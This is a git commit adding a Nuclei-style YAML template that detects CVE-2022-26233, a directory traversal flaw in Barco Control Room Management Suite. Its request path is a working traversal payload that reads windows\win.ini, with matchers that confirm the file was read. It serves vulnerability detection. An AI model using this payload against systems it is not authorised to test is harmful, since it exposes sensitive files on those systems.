Create CVE-2022-26233.yaml

patch-1
Roberto Nunes 2022-05-05 10:55:44 +09:00 committed by GitHub
parent e3bf8723e5
commit 67b4c3b0aa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

31
CVE-2022-26233.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite - Directory Traversal
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
reference:
- https://0day.today/exploit/37579
- https://www.cvedetails.com/cve/CVE-2022-26233
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
tags: cve,cve2022,barco,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and